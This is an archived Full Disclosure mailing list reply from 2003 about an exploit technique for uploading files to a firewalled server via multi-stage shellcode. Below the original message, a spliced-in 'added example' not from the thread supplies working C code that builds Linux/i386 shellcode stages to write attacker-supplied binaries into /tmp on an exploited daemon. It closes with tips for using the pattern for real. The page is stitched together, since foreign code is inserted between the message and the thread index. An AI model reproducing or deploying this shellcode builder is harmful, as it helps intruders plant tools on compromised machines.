Full Disclosure mailing list archives
Re: re: Global HIGH Security Risk
From: Jonathan Rickman <jonathan () xcorps net>
Date: Tue, 4 Feb 2003 09:13:25 -0500 (EST)
-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 4 Feb 2003, ^Shadown^ wrote:
Dear Folks,

Thanks for your answers helping me on how to post this information without getting in trouble. And to the ones that treat me as if I were stupid, all I have to say is that it was just simple. I don't know why it's not been documented; I've googled hard but couldn't find anything about it.

I've set up a server behind a fw (ipchains) without gcc, with a vulnerable daemon; the fw was set up just to allow the server to go through out by the binded daemon port only.

What I did first was just to code an exploit for the vulnerable daemon and add a simple command sequence to write down to the server an uuencoded file using the vi editor, then uudecode it and un-tar.gz it, and that way I could upload binary files (which could be tools, sniffers, local exploits, etc). That way I could upload binaries to execute on the remote server.

But I wanted to download files too (text and binaries), so I coded a sniffer which listens for a specific ID-sequence to start/stop dumping to a file, and coded a tool to send the ID-sequence and the file to the sniffer. All this worked right.

Then I removed all the programs that could be used as a text editor (joe, vim, cat, ed, etc), uudecode/uuencode, and compressing file tools. And I began to develop a technique which may be applied in any exploit code. It could be done many ways. Every coder is gonna do it its own way, but I did it mine.

I've coded an exploit with few options: -f file_to_upload, -s spawn_shell. The exploit sends different encrypted shellcodes depending on the options. A shellcode sends and writes down to /tmp the file, which firstly was fragmented by the exploit to be inserted into the multi-shellcode sequence (-f). The other is a standard shellcode.

As simple as this, so you can upload and download any file type, and execute it on the remote server. I think this explains the idea. I wish to post the PoC, but don't wanna get in trouble.

Cheers,
^Shadown^
Again, I'm not trying to play the antagonist here, just asking a question. If what you're saying is, you placed a vulnerable service behind a packet filter that allowed inbound connections to the vulnerable service...well, duh. Of course you can run the exploit.

I'm a bit confused by this statement: "allow the server to go through out by the binded daemon port only". Are you saying that it's set up the way I described in the paragraph above? Once again, I'm not being critical...just trying to get through the language barrier.

- --
Jonathan Rickman
X Corps Security
http://www.xcorps.net

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQEVAwUBPj/KjTTwrX0N9QH/AQGpqwf8DXpf+G/uGWIHQwITaiajAMk4y4XTt7+j
jYto+KCNBexdyHKSiEz6BblH2sEOKcJHqreqTDxdMKL+KzkIt34SlFujza4OcS4b
dFmq46PgHDrpEfaskjrKJnwwtwji8bJkU4N1stxei7f5WwyLMYXIZbhTJ6jl4Y9N
YROfUDDw0WlgZ/5Qg9TAIwm26sKf5HDCr/9lTI6ZVp398omZOLtLXoLz7pNf24Er
TL1/MdwX9cJ5LSzkmOm9PP51elRrNZfsPVwllLVJPnGkP5d/TuvnqYpjFeBSC3rs
yPAeAejSO/Gr7YirkA+2TdLTew0xbA6LfBZNVWQsy/o5ewDtfZSZzg==
=6jvh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
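The "multi shellcode" upload that ^Shadown^ describes in the quoted message (fragment a file on the attacker side, carry each fragment behind a stage of shellcode, have each stage append its fragment to a file under /tmp) can be shown concretely without his PoC, which was never posted. What follows is an added example written for this archive page, not code from ^Shadown^ or from anyone in the thread. It assumes a Linux/i386 target using the int 0x80 syscall ABI, a drop path of /tmp/x, and that the exploit re-hits the daemon once per stage (so the daemon must fork per connection or be respawned, since each stage exit()s the process it runs in). The "encryption" step he mentions is left out: a strcpy()-style vector would still need the data bytes, which here may contain NULs, to be encoded and decoded by a prefix stub. The sample "binary" is constructed.

```c
/* Added example (not from the original post): builder for the staged
 * file-upload shellcode described in the thread.  Each stage is a Linux/i386
 * int 0x80 stub that open()s a fixed path with O_APPEND, write()s the data
 * carried behind it, close()s and exit()s.  Path, chunk size and layout are
 * assumptions; the NUL/XOR encoding of the data is deliberately left out. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STAGE_PATH "/tmp/x"   /* assumed drop path: exactly 6 chars (stub patches byte 6) */
#define PATH_FIELD 7          /* path + one placeholder byte that becomes the NUL */
#define STUB_LEN   62         /* jmp + body + call */
#define HDR_LEN    (STUB_LEN + PATH_FIELD)
#define LEN_OFF    39         /* offset of the 16-bit write length inside the stub */

static const uint8_t stub[STUB_LEN] = {
    0xeb, 0x37,                         /* jmp short get_data                     */
    0x5e,                               /* back: pop esi ; esi -> path, then data */
    0x31, 0xc0, 0x88, 0x46, 0x06,       /* xor eax,eax ; mov [esi+6],al (NUL-terminate path) */
    0xb0, 0x05, 0x89, 0xf3,             /* mov al,5 (SYS_open) ; mov ebx,esi      */
    0x31, 0xc9, 0x66, 0xb9, 0x41, 0x04, /* xor ecx,ecx ; mov cx,O_WRONLY|O_CREAT|O_APPEND */
    0x31, 0xd2, 0x66, 0xba, 0xa4, 0x01, /* xor edx,edx ; mov dx,0644              */
    0xcd, 0x80, 0x89, 0xc3,             /* int 0x80 ; mov ebx,eax (fd)            */
    0x31, 0xc0, 0xb0, 0x04,             /* xor eax,eax ; mov al,4 (SYS_write)     */
    0x8d, 0x4e, 0x07,                   /* lea ecx,[esi+7] ; data follows path    */
    0x31, 0xd2, 0x66, 0xba, 0x00, 0x00, /* xor edx,edx ; mov dx,LEN (patched at LEN_OFF) */
    0xcd, 0x80,                         /* int 0x80                               */
    0x31, 0xc0, 0xb0, 0x06, 0xcd, 0x80, /* close(fd)                              */
    0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, /* exit(0)                    */
    0xe8, 0xc4, 0xff, 0xff, 0xff        /* get_data: call back (pushes &path)     */
};

/* Build one stage: stub || "/tmp/x" || placeholder || chunk.  Returns the
 * stage length, or 0 if the chunk is empty, too long for dx, or does not fit. */
size_t build_stage(const uint8_t *chunk, size_t len, uint8_t *out, size_t cap)
{
    if (len == 0 || len > 0xffff || cap < HDR_LEN + len) return 0;
    memcpy(out, stub, STUB_LEN);
    out[LEN_OFF] = (uint8_t)(len & 0xff);
    out[LEN_OFF + 1] = (uint8_t)(len >> 8);
    memcpy(out + STUB_LEN, STAGE_PATH, 6);
    out[STUB_LEN + 6] = 'X';            /* overwritten with 0 at run time */
    memcpy(out + HDR_LEN, chunk, len);
    return HDR_LEN + len;
}

/* 1 if the stub or path field contains a NUL (a strcpy()-style overflow would
 * truncate there).  The only variable bytes are the two length bytes, so pick
 * chunk sizes whose low and high bytes are both non-zero, e.g. 0x101. */
int stub_has_nul(const uint8_t *stage)
{
    for (size_t i = 0; i < HDR_LEN; i++) if (stage[i] == 0) return 1;
    return 0;
}

/* Parse a stage the way the target executes it: return the byte count the
 * stub's write() will append and point *data at those bytes; 0 if malformed. */
size_t stage_data(const uint8_t *stage, size_t stagelen, const uint8_t **data)
{
    if (stagelen < HDR_LEN || memcmp(stage, stub, LEN_OFF) != 0) return 0;
    size_t len = stage[LEN_OFF] | ((size_t)stage[LEN_OFF + 1] << 8);
    if (len == 0 || HDR_LEN + len > stagelen) return 0;
    *data = stage + HDR_LEN;
    return len;
}

/* Fragment `file` into chunks of at most `chunk` bytes and push each stage
 * through `send` (one call models one re-exploitation of the daemon).
 * Returns the number of stages sent, or 0 on failure. */
size_t upload_file(const uint8_t *file, size_t filelen, size_t chunk,
                   int (*send)(const uint8_t *stage, size_t n, void *ctx), void *ctx)
{
    uint8_t stage[HDR_LEN + 0xffff];
    size_t sent = 0, nstages = 0;
    while (sent < filelen) {
        size_t n = filelen - sent < chunk ? filelen - sent : chunk;
        size_t slen = build_stage(file + sent, n, stage, sizeof stage);
        if (!slen || !send(stage, slen, ctx)) return 0;
        sent += n;
        nstages++;
    }
    return nstages;
}

/* Test sink: models the target appending each stage's data to /tmp/x. */
struct sink { uint8_t buf[4096]; size_t len; };
static int sink_send(const uint8_t *stage, size_t n, void *ctx)
{
    struct sink *s = ctx;
    const uint8_t *d;
    size_t len = stage_data(stage, n, &d);
    if (!len || s->len + len > sizeof s->buf) return 0;
    memcpy(s->buf + s->len, d, len);
    s->len += len;
    return 1;
}

/* Constructed sample "binary": contains NUL and high bytes on purpose. */
static const uint8_t sample[] = { 0x7f, 'E', 'L', 'F', 0, 0, 1, 0xff, 'h', 'i', 0, '!' };

int main(void)
{
    struct sink s;
    memset(&s, 0, sizeof s);
    size_t stages = upload_file(sample, sizeof sample, 5, sink_send, &s);
    printf("%zu stages, %zu bytes reassembled, match=%d\n", stages, s.len,
           s.len == sizeof sample && memcmp(s.buf, sample, s.len) == 0);
    return 0;
}
```

Two things a practitioner would add before using this pattern for real: the first stage should open with O_TRUNC (or unlink the path) rather than O_APPEND, otherwise a stale /tmp/x from an earlier run corrupts the upload; and the stub_has_nul() check only covers the stub itself, so binary chunks still need the encoding layer that the original post alludes to with "encrypted shellcodes".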
Current thread:
- Re: Global HIGH Security Risk, (continued)
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Message not available
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Message not available
- Re: Global HIGH Security Risk yossarian (Feb 03)
- Re: Global HIGH Security Risk Jonathan Rickman (Feb 03)
- Re: Global HIGH Security Risk Benjamin Keller (Feb 03)
- Re: Global HIGH Security Risk Michael Renzmann (Feb 04)
- Re: Global HIGH Security Risk Benjamin Keller (Feb 03)
- RE: Global HIGH Security Risk bugtraq (Feb 03)
- Re: Global HIGH Security Risk David Howe (Feb 04)
- Global HIGH Security Risk phenethyl (Feb 03)
- re: Global HIGH Security Risk ^Shadown^ (Feb 03)
- Re: re: Global HIGH Security Risk David Howe (Feb 04)
- Re: re: Global HIGH Security Risk Jonathan Rickman (Feb 04)
- RE: Global HIGH Security Risk John . Airey (Feb 04)
- Re: Global HIGH Security Risk ^Shadown^ (Feb 06)
- RE: Global HIGH Security Risk Lance Fitz-Herbert (Feb 04)
- RE: Global HIGH Security Risk Jeroen Doorn (Feb 04)
- RE: Global HIGH Security Risk Jonathan Rickman (Feb 04)
- RE: Global HIGH Security Risk Melvyn Sopacua (Feb 04)
- Re: Global HIGH Security Risk Peter (Feb 04)
- RE: Global HIGH Security Risk Jonathan Rickman (Feb 04)